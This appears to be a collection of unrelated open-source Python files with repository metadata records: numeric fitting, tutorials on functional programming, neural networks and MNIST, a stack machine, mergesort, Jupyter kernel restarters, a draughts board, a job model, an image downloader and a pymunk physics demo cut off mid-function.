Mark Rivers.
Python version, May 2002, Mark Rivers
"""
n = min(len(x), len(y)) # size = smaller of x,y
m = ndegree + 1 # number of elements in coeff vector
a = numpy.zeros((m,m), float) # least square matrix, weighted matrix
b = numpy.zeros(m, float) # will contain sum w*y*x^j
z = numpy.ones(n, float) # basis vector for constant term
a[0,0] = numpy.sum(w)
b[0] = numpy.sum(w*y)
for p in range(1, 2*ndegree+1): # power loop
z = z*x # z is now x^p
if (p < m): b[p] = numpy.sum(w*y*z) # b is sum w*y*x^j
sum = numpy.sum(w*z)
for j in range(max(0,(p-ndegree)), min(ndegree,p)+1):
a[j,p-j] = sum
a = numpy.linalg.inv(a)
c = numpy.dot(b, a)
if not return_fit:
return c # exit if only fit coefficients are wanted
# compute optional output parameters.
yfit = numpy.zeros(n, float)+c[0] # one-sigma error estimates, init
for k in range(1, ndegree +1):
yfit = yfit + c[k]*(x**k) # sum basis vectors
var = numpy.sum((yfit-y)**2 )/(n-m) # variance estimate, unbiased
sigma = numpy.sqrt(var)
yband = numpy.zeros(n, float) + a[0,0]
z = numpy.ones(n, float)
for p in range(1,2*ndegree+1): # compute correlated error estimates on y
z = z*x # z is now x^p
sum = 0.
for j in range(max(0, (p - ndegree)), min(ndegree, p)+1):
sum = sum + a[j,p-j]
yband = yband + sum * z # add in all the error sources
yband = yband*var
yband = numpy.sqrt(yband)
return c, yfit, yband, sigma, a
| {
"repo_name": "r-owen/stui",
"path": "TUI/Base/BaseFocusScript.py",
"copies": "1",
"size": "70727",
"license": "bsd-3-clause",
"hash": 5207280033848373000,
"line_mean": 38.66741447,
"line_max": 126,
"alpha_frac": 0.5892516295,
"autogenerated": false,
"ratio": 3.804981708629223,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9781287394471703,
"avg_score": 0.02258918873150419,
"num_lines": 1783
} |
# A basic functional programming in Python
# a function to calculate a squared number
def square(n):
return n ** 2
# Lambda expression to calculate a squared number
lambda_square = lambda x: x**2
print (square(5))
print (lambda_square(5))
# a recursive function to calculate the factorial of a number
def fat(n):
if (n == 0):
return 1
return (n * fat(n - 1))
# Lambda expression to calculate the factorial of a number
lambda_fat = lambda x: x * lambda_fat(x - 1) if x > 0 else 1
print (fat (5))
print (lambda_fat(5))
# Map: Apply function to every item of iterable and return a list of the results
l = [2, 4, 6, 8]
m = map(lambda x: x ** 2, l)
for i in m:
print (i)
# Reduce: Performing some computation on a list and returning the result
# removed from python 3, to use we must import functools
from functools import reduce
print (reduce(lambda x, y: x + y, [1, 2, 3, 4, 5]))
# Filter: Creates a list of elements for which a function returns true
f = filter(lambda x: x % 2 == 0, range(10))
for i in f:
print (i) | {
"repo_name": "felipeparpinelli/algorithms_and_data_structures",
"path": "functional_programming.py",
"copies": "1",
"size": "1032",
"license": "mit",
"hash": -7420935206150086000,
"line_mean": 24.1951219512,
"line_max": 80,
"alpha_frac": 0.6879844961,
"autogenerated": false,
"ratio": 3.1559633027522938,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9175136035727363,
"avg_score": 0.033762352624986246,
"num_lines": 41
} |
"""A basic implementation of a Neural Network
by following the tutorial by Andrew Trask
http://iamtrask.github.io/2015/07/12/basic-python-network/
"""
import numpy as np
# sigmoid function
def nonlin(x, deriv=False):
if deriv==True:
return x * (1-x)
return 1 / (1 + np.exp(-x))
# input dataset
x = np.array([[0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1]])
# output dataset
y = np.array([[0, 0, 1, 1]]).T
# seed random numbers to make calculation
# deterministic (good practice)
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 2*np.random.random((3, 1)) - 1
for i in xrange(10000):
# forward propagation
l0 = x
l1 = nonlin(np.dot(l0, syn0))
print l1
break
# how much did we miss
l1_error = y - l1
# multiply how much we missed by the
# slope of the sigmoid at the values in l1
l1_delta = l1_error * nonlin(l1, True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
print 'Output after training:'
print l1
| {
"repo_name": "alexandercrosson/ml",
"path": "neural_network/basic.py",
"copies": "1",
"size": "1043",
"license": "mit",
"hash": 2972435385755649500,
"line_mean": 20.2857142857,
"line_max": 58,
"alpha_frac": 0.6049856184,
"autogenerated": false,
"ratio": 3.0231884057971015,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9106464705549007,
"avg_score": 0.004341863729618832,
"num_lines": 49
} |
"""A basic implementation of a pushdown stack,
using a subclassed Python list."""
# -*- coding: utf-8 -*-
__author__ = """Chris Tabor (dxdstudio@gmail.com)"""
IS_MAIN = True if __name__ == '__main__' else False
if IS_MAIN:
from os import getcwd
from os import sys
sys.path.append(getcwd())
import operator
from MOAL.helpers.display import Section
class StackMachine(list):
def __init__(self, *args, **kwargs):
super(StackMachine, self).__init__(*args, **kwargs)
def __str__(self):
return '\n'.join(self)
def _from_operator(self, token):
if token == '/':
return 'divide'
elif token == '*':
return 'multiply'
elif token == '+':
return 'add'
elif token == '-':
return 'subtract'
else:
return 'push {}'.format(token)
def _to_operator(self, token):
if token == 'divide':
return operator.div
elif token == 'multiply':
return operator.mul
elif token == 'add':
return operator.add
elif token == 'subtract':
return operator.sub
def evaluate(self):
"""Evaluate items on the stack.
In this case, it should only be the first three items:
[operand, operand, operator].
"""
operand1, operand2, operator = (
int(self.pop().replace('push ', '')),
int(self.pop().replace('push ', '')),
self._to_operator(self.pop()),
)
res = operator(operand1, operand2)
print('evaluation result = {}'.format(res))
return res
def append(self, val):
"""Add an item to stack.
Expressions are tokenized and then sorted so the operands are the first
two indices, which are evaluated ala prefix notation using LIFO.
"""
# sub = []
try:
vals = val.split(' ')
except AttributeError:
return
for token in vals:
try:
token = 'push {}'.format(int(token))
super(StackMachine, self).append(token)
except ValueError:
super(StackMachine, self).insert(
0, self._from_operator(token))
if IS_MAIN:
with Section('Pushdown stack'):
exprs = [
(5, '2 + 3'),
(3, '3 * 1'),
(999, '0 + 999'),
(1000, '10 * 100'),
(-1000, '-10 * 100'),
(0, '0 * 1'),
(1, '1 / 1'),
(10, '1 / 10'),
(0, '10 / 2'),
(5, '2 / 10'),
]
smachine = StackMachine()
for item in exprs:
expected, expr = item
smachine.append(expr)
res = smachine.evaluate()
print('Expected {}, Res = {}'.format(expected, res))
assert expected == res
print(smachine)
| {
"repo_name": "christabor/MoAL",
"path": "MOAL/automata_theory/stack_machine.py",
"copies": "1",
"size": "2927",
"license": "apache-2.0",
"hash": -2736041161995323400,
"line_mean": 26.1018518519,
"line_max": 79,
"alpha_frac": 0.4933378886,
"autogenerated": false,
"ratio": 4.217579250720461,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5210917139320461,
"avg_score": null,
"num_lines": null
} |
# A basic implementation of merge sort - https://en.wikipedia.org/wiki/Merge_sort
# Uses O(n) storage space
# TODO allocate a work array at beginning instead of smaller, more frequent allocations
# and optimize space usage
# A recursive implementation
def mergesort_rec(array, left=0, right=None):
if right is None:
right = len(array) - 1
if left == right:
return [array[left]]
m = (left + right) // 2
sleft = mergesort_rec(array, left, m)
sright = mergesort_rec(array, m + 1, right)
return _merge(sleft, sright)
# A bottom-up, iterative implementation
def mergesort(array):
w = 1
while w <= len(array):
for i in range(0, len(array), 2 * w):
a = array[i: i + w]
b = array[i + w: i + 2 * w]
merged = _merge(a, b)
# write sorted, merged array over original array
for j, v in enumerate(merged, i):
array[j] = v
w *= 2
def _merge(sleft, sright):
i = j = 0
a = []
while i < len(sleft) and j < len(sright):
if sleft[i] > sright[j]:
a.append(sright[j])
j += 1
else:
a.append(sleft[i])
i += 1
# merge remaining list
r, k = (sleft, i) if j == len(sright) else (sright, j)
while k < len(r):
a.append(r[k])
k += 1
return a
if __name__ == '__main__':
import random
seq = [random.randint(-10, 10) for n in range(20)]
print("Unsorted", seq)
mergesort(seq)
print("Sorted", seq)
| {
"repo_name": "calebperkins/algorithms",
"path": "algorithms/mergesort.py",
"copies": "1",
"size": "1544",
"license": "mit",
"hash": -2571218328630572500,
"line_mean": 24.3114754098,
"line_max": 87,
"alpha_frac": 0.5440414508,
"autogenerated": false,
"ratio": 3.313304721030043,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.43573461718300427,
"avg_score": null,
"num_lines": null
} |
# a basic implementation of the MNIST classifier through multinomial logistic regression
import tensorflow as tf
# import the dataset called MNIST for handwritten digit classification
from tensorflow.examples.tutorials.mnist import input_data
mnist_data = input_data.read_data_sets("MNIST_data/", one_hot=True)
# create the input placeholder variable which represents our independent variable
# here x is a rank 2 tensor with arbitrary size 1st dimension and 784 as the 2nd dimension
x = tf.placeholder(tf.float32, [None, 784])
# the linear weight matrix W and bias vector b are the parameters to be learnt in our model
# here we are predicting y as softmax(W*x + b)
# W is a [784, 10] rank 2 tensor and b is a [10] rank 1 tensor
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
# we define the model by the softmax (multinomial logistic regression model) equation as stated above
model = tf.nn.softmax(tf.matmul(x, W) + b)
# our loss function will be the cross entropy function of our predictions weighted by the actual values
y = tf.placeholder(tf.float32, [None, 10])
# here the sum is taken over the second dimension of y (of size 10) and the mean over the batch size (first dimension)
# cross_entropy_loss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(model), reduction_indices=[1]))
# the above is numerically unstable (will do a test later) so we will resort to use the tensorflow implementation
cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=tf.matmul(x, W) + b, labels=y))
# define the training graph of the model to use gradient descent
alpha = 0.4
train_step = tf.train.GradientDescentOptimizer(alpha).minimize(cross_entropy_loss)
# run the gradient descent algorithm for a pre-specified number of iterations
num_of_iterations = 1000
batch_size = 100
session = tf.InteractiveSession()
tf.global_variables_initializer().run()
# here we are applying stochastic gradient descent by only using a portion of the training data (chosen at random)
# on each iteration
for i in range(num_of_iterations):
batch_xs, batch_ys = mnist_data.train.next_batch(batch_size)
session.run(train_step, {x: batch_xs, y: batch_ys})
loss_value = session.run(cross_entropy_loss, {x: batch_xs, y: batch_ys})
print("Value of the loss function (cross entropy) on iteration %s: %s" % (i, loss_value))
# we evaluate the predictive correctness of the model by measuring the deviation from the true values
correctness_metric = tf.equal(tf.argmax(model, 1), tf.argmax(y,1))
# the above returns a rank 1 tensor of booleans which we will cast to numbers and calculate the mean
accuracy = tf.reduce_mean(tf.cast(correctness_metric, tf.float32))
# the accuracy metric is then calculated on the test data
print(session.run(accuracy, {x: mnist_data.test.images, y: mnist_data.test.labels}))
| {
"repo_name": "RMDev97/Tensor-Flow-Projects",
"path": "MNIST/mnist_basic.py",
"copies": "1",
"size": "2852",
"license": "apache-2.0",
"hash": 7788956957770939000,
"line_mean": 44.2698412698,
"line_max": 118,
"alpha_frac": 0.7545582048,
"autogenerated": false,
"ratio": 3.5340768277571253,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9695081564072272,
"avg_score": 0.018710693696970617,
"num_lines": 63
} |
"""A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import warnings
from zmq.eventloop import ioloop
from jupyter_client.restarter import KernelRestarter
from traitlets import (
Instance,
)
class IOLoopKernelRestarter(KernelRestarter):
"""Monitor and autorestart a kernel."""
loop = Instance('tornado.ioloop.IOLoop')
def _loop_default(self):
warnings.warn("IOLoopKernelRestarter.loop is deprecated in jupyter-client 5.2",
DeprecationWarning, stacklevel=4,
)
return ioloop.IOLoop.current()
_pcallback = None
def start(self):
"""Start the polling of the kernel."""
if self._pcallback is None:
self._pcallback = ioloop.PeriodicCallback(
self.poll, 1000*self.time_to_dead,
)
self._pcallback.start()
def stop(self):
"""Stop the kernel polling."""
if self._pcallback is not None:
self._pcallback.stop()
self._pcallback = None
class AsyncIOLoopKernelRestarter(IOLoopKernelRestarter):
async def poll(self):
if self.debug:
self.log.debug('Polling kernel...')
is_alive = await self.kernel_manager.is_alive()
if not is_alive:
if self._restarting:
self._restart_count += 1
else:
self._restart_count = 1
if self._restart_count >= self.restart_limit:
self.log.warning("AsyncIOLoopKernelRestarter: restart failed")
self._fire_callbacks('dead')
self._restarting = False
self._restart_count = 0
self.stop()
else:
newports = self.random_ports_until_alive and self._initial_startup
self.log.info('AsyncIOLoopKernelRestarter: restarting kernel (%i/%i), %s random ports',
self._restart_count,
self.restart_limit,
'new' if newports else 'keep'
)
self._fire_callbacks('restart')
await self.kernel_manager.restart_kernel(now=True, newports=newports)
self._restarting = True
else:
if self._initial_startup:
self._initial_startup = False
if self._restarting:
self.log.debug("AsyncIOLoopKernelRestarter: restart apparently succeeded")
self._restarting = False
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/jupyter_client/ioloop/restarter.py",
"copies": "1",
"size": "2664",
"license": "mit",
"hash": -581819577748755200,
"line_mean": 31.8888888889,
"line_max": 103,
"alpha_frac": 0.5938438438,
"autogenerated": false,
"ratio": 4.3387622149837135,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5432606058783713,
"avg_score": null,
"num_lines": null
} |
"""A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import absolute_import
from zmq.eventloop import ioloop
from IPython.kernel.restarter import KernelRestarter
from IPython.utils.traitlets import (
Instance,
)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
class IOLoopKernelRestarter(KernelRestarter):
"""Monitor and autorestart a kernel."""
loop = Instance('zmq.eventloop.ioloop.IOLoop', allow_none=False)
def _loop_default(self):
return ioloop.IOLoop.instance()
_pcallback = None
def start(self):
"""Start the polling of the kernel."""
if self._pcallback is None:
self._pcallback = ioloop.PeriodicCallback(
self.poll, 1000 * self.time_to_dead, self.loop
)
self._pcallback.start()
def stop(self):
"""Stop the kernel polling."""
if self._pcallback is not None:
self._pcallback.stop()
self._pcallback = None
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/kernel/ioloop/restarter.py",
"copies": "1",
"size": "1727",
"license": "mit",
"hash": 1995729370133842200,
"line_mean": 29.8392857143,
"line_max": 78,
"alpha_frac": 0.4829183555,
"autogenerated": false,
"ratio": 5.233333333333333,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00135623869801085,
"num_lines": 56
} |
# This code is licensed under the MIT License.
#
# MIT License
#
# Copyright (c) 2016 Luca Vallerini
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Author: Luca Vallerini
# E-mail: lucavall90@gmail.com
#
# Date: 2016-10-31
# Last update: 2016-10-31
from array import array
# Draw the board game
def draw_board_game(values):
print " 1 2 3 4 5 6 7 8" # columns coordinates
for i in range(8):
print " " + " ---" * 8
row = str(i + 1) + " " # lines coordinates
for j in range(8):
if j == 7:
row += "| " + values[8 * i + j] + " |"
else:
row += "| " + values[8 * i + j] + " "
print row
print " " + " ---" * 8
# Start the game
def start():
print "Welcome to Italian draughts!\n"
board = array('c', [])
for i in range(64):
if ((0 <= i < 8 or 16 <= i < 24) and i % 2 == 0) or ((8 <= i < 16) and (i + 1) % 2 == 0):
board.append('x')
elif ((40 <= i < 48 or 56 <= i < 64) and (i + 1) % 2 == 0) or ((48 <= i < 56) and i % 2 == 0):
board.append('y')
else:
board.append(' ')
draw_board_game(board)
start()
| {
"repo_name": "lucavallerini/miscellanea",
"path": "dama/dama.py",
"copies": "1",
"size": "2251",
"license": "mit",
"hash": -7245532720909321000,
"line_mean": 30.7042253521,
"line_max": 102,
"alpha_frac": 0.6183918259,
"autogenerated": false,
"ratio": 3.5958466453674123,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4714238471267412,
"avg_score": null,
"num_lines": null
} |
""" A basic job model, and local job implementation.
author: Brian Schrader
since: 2016-01-04
"""
import os
from subprocess import Popen, PIPE
def call(args, stdout=PIPE, stderr=PIPE):
""" Calls the given arguments in a seperate process
and returns the contents of standard out.
"""
p = Popen(args, stdout=stdout, stderr=stderr)
out, err = p.communicate()
try:
return out.decode(sys.stdout.encoding), err.decode(sys.stdout.encoding)
except Exception:
return out, err
class Job(object):
""" A template job class that just runs the given command script locally.
To make your own custom jobs, subclass this Job and override the status methods, the submit method, and cmd property.
Submitting a job cannot block execution. The submit call should return
immediately so that other jobs can be executed, and tracked.
"""
JOB_FILE_PATTERN = 'metapipe.{}.job'
MAX_RETRY = 5
def __init__(self, alias, command, depends_on=[]):
""" Create an new job with the given name, and command. """
self.command = command
self.depends_on = depends_on
self.alias = alias
self.attempts = 0
self.filename = self.JOB_FILE_PATTERN.format(self.alias)
def __repr__(self):
return '<Job: {}>'.format(self.cmd)
def __cmp__(self, other):
return cmp(self.alias, other.alias)
def make(self):
""" Evaluate the command, and write it to a file. """
eval = self.command.eval()
with open(self.filename, 'w') as f:
f.write(eval)
@property
def should_retry(self):
return self.attempts < self.MAX_RETRY
# Override these...
@property
def cmd(self):
""" Returns the command needed to submit the calculations.
Normally, this would be just running the command, however if
using a queue system, then this should return the command to
submit the command to the queue.
"""
pass
def submit(self):
""" Submits the job to be run. If an external queue system is used,
this method submits itself to that queue. Else it runs the job itself.
:see: call
"""
pass
def is_running(self):
""" Returns whether the job is running or not. """
pass
def is_queued(self):
""" Returns whether the job is queued or not.
This function is only used if jobs are submitted to an external queue.
"""
pass
def is_complete(self):
""" Returns whether the job is complete or not. """
pass
def is_error(self):
""" Checks to see if the job errored out. """
pass
def is_failed(self):
""" Checks to see if the job has failed. This is usually if the job
should not be resubmitted.
"""
pass
| {
"repo_name": "Sonictherocketman/metapipe",
"path": "metapipe/models/job.py",
"copies": "2",
"size": "2869",
"license": "mit",
"hash": 3285695016634496000,
"line_mean": 27.4059405941,
"line_max": 121,
"alpha_frac": 0.6151969327,
"autogenerated": false,
"ratio": 4.212922173274596,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5828119105974596,
"avg_score": null,
"num_lines": null
} |
"""A basic kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
It is an incomplete base class, and must be subclassed.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.traitlets import (
Instance, Float, Dict, Bool, Integer,
)
class KernelRestarter(LoggingConfigurable):
"""Monitor and autorestart a kernel."""
kernel_manager = Instance('IPython.kernel.KernelManager')
debug = Bool(False, config=True,
help="""Whether to include every poll event in debugging output.
Has to be set explicitly, because there will be *a lot* of output.
"""
)
time_to_dead = Float(3.0, config=True,
help="""Kernel heartbeat interval in seconds."""
)
restart_limit = Integer(5, config=True,
help="""The number of consecutive autorestarts before the kernel is presumed dead."""
)
_restarting = Bool(False)
_restart_count = Integer(0)
callbacks = Dict()
def _callbacks_default(self):
return dict(restart=[], dead=[])
def start(self):
"""Start the polling of the kernel."""
raise NotImplementedError("Must be implemented in a subclass")
def stop(self):
"""Stop the kernel polling."""
raise NotImplementedError("Must be implemented in a subclass")
def add_callback(self, f, event='restart'):
"""register a callback to fire on a particular event
Possible values for event:
'restart' (default): kernel has died, and will be restarted.
'dead': restart has failed, kernel will be left dead.
"""
self.callbacks[event].append(f)
def remove_callback(self, f, event='restart'):
"""unregister a callback to fire on a particular event
Possible values for event:
'restart' (default): kernel has died, and will be restarted.
'dead': restart has failed, kernel will be left dead.
"""
try:
self.callbacks[event].remove(f)
except ValueError:
pass
def _fire_callbacks(self, event):
"""fire our callbacks for a particular event"""
for callback in self.callbacks[event]:
try:
callback()
except Exception as e:
self.log.error(
"KernelRestarter: %s callback %r failed", event, callback, exc_info=True)
def poll(self):
if self.debug:
self.log.debug('Polling kernel...')
if not self.kernel_manager.is_alive():
if self._restarting:
self._restart_count += 1
else:
self._restart_count = 1
if self._restart_count >= self.restart_limit:
self.log.warn("KernelRestarter: restart failed")
self._fire_callbacks('dead')
self._restarting = False
self._restart_count = 0
self.stop()
else:
self.log.info('KernelRestarter: restarting kernel (%i/%i)',
self._restart_count,
self.restart_limit
)
self._fire_callbacks('restart')
self.kernel_manager.restart_kernel(now=True)
self._restarting = True
else:
if self._restarting:
self.log.debug("KernelRestarter: restart apparently succeeded")
self._restarting = False
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/kernel/restarter.py",
"copies": "1",
"size": "3781",
"license": "mit",
"hash": 475428733550827140,
"line_mean": 32.1666666667,
"line_max": 113,
"alpha_frac": 0.572335361,
"autogenerated": false,
"ratio": 4.70273631840796,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.577507167940796,
"avg_score": null,
"num_lines": null
} |
"""A basic module designed to download images on your server.
Please note this is always a risky thing to do.
I've added a pretty basic safety that will check what we downloaded
is REALLY an image, however this could prove not to be enough,
so use with caution."""
import urllib2
import os
from PIL import Image
def download(path, url, count):
"""Given a path (basis), a url, and a number, will :
- Compute a destination name for the image, based on the number transformed to an hex (because hex are cool).
- Try and download an image from the URL, and save it to the server in the static folder of the Falsk app,
with the new, computed name.
- Return this new name so it can be saved - without the path - in a database."""
hex_name = next_as_hexa(count) + '.' + url.split(".")[-1]
new_name = path + hex_name
download_url_to(url, new_name)
return hex_name
def download_url_to(url, filename):
"""Download a file, byte from byte, from a given URL and check it is an image.
If it is not an image, remove the image and throw an IOError."""
u = urllib2.urlopen(url)
f = open(filename, 'wb')
meta = u.info()
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
f.write(buffer)
f.close()
if not check_if_image(filename):
# Not an image : let's delete this, better safe than sorry
os.remove(filename)
raise IOError("This is not an image !")
def check_if_image(filename):
"""Check if it is animage by using PIL. If PIL cannot open the file,
it is not an image."""
try:
Image.open(filename)
except IOError:
return False
return True
def size_of_folder(basis):
"""Compute the size of the static img repo."""
return bytes_as_megabytes(sum([os.path.getsize(basis + "static/img/" + f) for f in os.listdir(basis + "static/img")]))
def bytes_as_megabytes(num):
"""Simply convert bytes to MB for human readability. Should be improved to handle GB."""
return str(num//(1000*1000)) + "MB"
def next_as_hexa(num):
return hex(num + 1)
| {
"repo_name": "Raveline/Gullom",
"path": "downloader.py",
"copies": "1",
"size": "2129",
"license": "mit",
"hash": 2368521082937261600,
"line_mean": 35.7068965517,
"line_max": 122,
"alpha_frac": 0.6580554251,
"autogenerated": false,
"ratio": 3.6146010186757214,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47726564437757213,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__docformat__ = "reStructuredText"
import pygame
import pymunk as pm
import pymunk.util as u
from pymunk import Vec2d
# TODO: Clean up code
COLLTYPE_DEFAULT = 0
COLLTYPE_MOUSE = 1
class PhysicsDemo:
def flipyv(self, v):
return int(v.x), int(-v.y + self.h)
def __init__(self):
self.running = True
### Init pygame and create screen
pygame.init()
self.w, self.h = 600, 600
self.screen = pygame.display.set_mode((self.w, self.h))
self.clock = pygame.time.Clock()
### Init pymunk and create space
self.space = pm.Space()
self.space.gravity = (0.0, -900.0)
### Walls
self.walls = []
self.create_wall_segments([(100, 50), (500, 50)])
## Balls
# balls = [createBall(space, (100,300))]
self.balls = []
### Polys
self.polys = []
h = 10
for y in range(1, h):
# for x in range(1, y):
x = 0
s = 10
p = Vec2d(300, 40) + Vec2d(0, y * s * 2)
self.polys.append(self.create_box(p, size=s, mass=1))
self.run_physics = True
### Wall under construction
self.wall_points = []
### Poly under construction
self.poly_points = []
self.shape_to_remove = None
self.mouse_contact = None
def draw_helptext(self):
font = pygame.font.Font(None, 16)
text = [
"LMB: Create ball",
"LMB + Shift: Create box",
"RMB on object: Remove object",
"RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)",
"RMB + Ctrl: Create wall, release to finish",
"Space: Stop physics simulation",
"k: Spawn a bunch of blocks",
"f: Fire a ball from the top left corner",
]
y = 5
for line in text:
text = font.render(line, True, pygame.Color("black"))
self.screen.blit(text, (5, y))
y += 10
def create_ball(self, point, mass=1.0, radius=15.0):
moment = pm.moment_for_circle(mass, 0.0, radius)
ball_body = pm.Body(mass, moment)
ball_body.position = Vec2d(*point)
ball_shape = pm.Circle(ball_body, radius)
ball_shape.friction = 1.5
ball_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(ball_body, ball_shape)
return ball_shape
def create_box(self, pos, size=10, mass=5.0):
box_points = [(-size, -size), (-size, size), (size, size), (size, -size)]
return self.create_poly(box_points, mass=mass, pos=pos)
def create_poly(self, points, mass=5.0, pos=(0, 0)):
moment = pm.moment_for_poly(mass, points)
# moment = 1000
body = pm.Body(mass, moment)
body.position = Vec2d(*pos)
shape = pm.Poly(body, points)
shape.friction = 0.5
shape.collision_type = COLLTYPE_DEFAULT
self.space.add(body, shape)
return shape
def create_wall_segments(self, points):
"""Create a number of wall segments connecting the points"""
if len(points) < 2:
return []
points = [Vec2d(*p) for p in points]
for i in range(len(points) - 1):
v1 = Vec2d(points[i].x, points[i].y)
v2 = Vec2d(points[i + 1].x, points[i + 1].y)
wall_body = pm.Body(body_type=pm.Body.STATIC)
wall_shape = pm.Segment(wall_body, v1, v2, 0.0)
wall_shape.friction = 1.0
wall_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(wall_body, wall_shape)
self.walls.append(wall_shape)
def run(self):
while self.running:
self.loop()
def draw_ball(self, ball):
body = ball.body
v = body.position + ball.offset.cpvrotate(body.rotation_vector)
p = self.flipyv(v)
r = ball.radius
pygame.draw.circle(self.screen, pygame.Color("blue"), p, int(r), 2)
def draw_wall(self, wall):
body = wall.body
pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
pygame.draw.lines(self.screen, pygame.Color("lightgray"), False, [pv1, pv2])
def draw_poly(self, poly):
body = poly.body
ps = [p.rotated(body.angle) + body.position for p in poly.get_vertices()]
ps.append(ps[0])
ps = list(map(self.flipyv, ps))
if u.is_clockwise(ps):
color = pygame.Color("green")
else:
color = pygame.Color("red")
pygame.draw.lines(self.screen, color, False, ps)
def draw(self):
### Clear the screen
self.screen.fill(pygame.Color("white"))
### Display some text
self.draw_helptext()
### Draw balls
for ball in self.balls:
self.draw_ball(ball)
### Draw walls
for wall in self.walls:
self.draw_wall(wall)
### Draw polys
for poly in self.polys:
self.draw_poly(poly)
### Draw Uncompleted walls
if len(self.wall_points) > 1:
ps = [self.flipyv(Vec2d(*p)) for p in self.wall_points]
pygame.draw.lines(self.screen, pygame.Color("gray"), False, ps, 2)
### Uncompleted poly
if len(self.poly_points) > 1:
ps = [self.flipyv(Vec2d(*p)) for p in self.poly_points]
pygame.draw.lines(self.screen, pygame.Color("red"), False, ps, 2)
### Mouse Contact
if self.mouse_contact is not None:
p = self.flipyv(self.mouse_contact)
pygame.draw.circle(self.screen, pygame.Color("red"), p, 3)
### All done, lets flip the display
pygame.display.flip()
def loop(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
self.running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:
pygame.image.save(self.screen, "playground.png")
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1: # LMB
if pygame.key.get_mods() & pygame.KMOD_SHIFT:
p = self.flipyv(Vec2d(*event.pos))
self.polys.append(self.create_box(pos=p))
else:
# t = -10000
p = self.flipyv(Vec2d(*event.pos))
self.balls.append(self.create_ball(p))
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3: # RMB
if pygame.key.get_mods() & pygame.KMOD_SHIFT:
pass
elif pygame.key.get_mods() & pygame.KMOD_CTRL:
p = self.flipyv(Vec2d(*event.pos))
self.wall_points.append(p)
elif self.shape_to_remove is not None:
self.balls = list(
filter(lambda a: a != self.shape_to_remove, self.balls)
)
self.walls = list(
filter(lambda a: a != self.shape_to_remove, self.walls)
)
self.polys = list(
filter(lambda a: a != self.shape_to_remove, self.polys)
)
self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
elif event.type == pygame.KEYUP and event.key in (
pygame.K_RCTRL,
pygame.K_LCTRL,
):
### Create Wall
self.create_wall_segments(self.wall_points)
self.wall_points = []
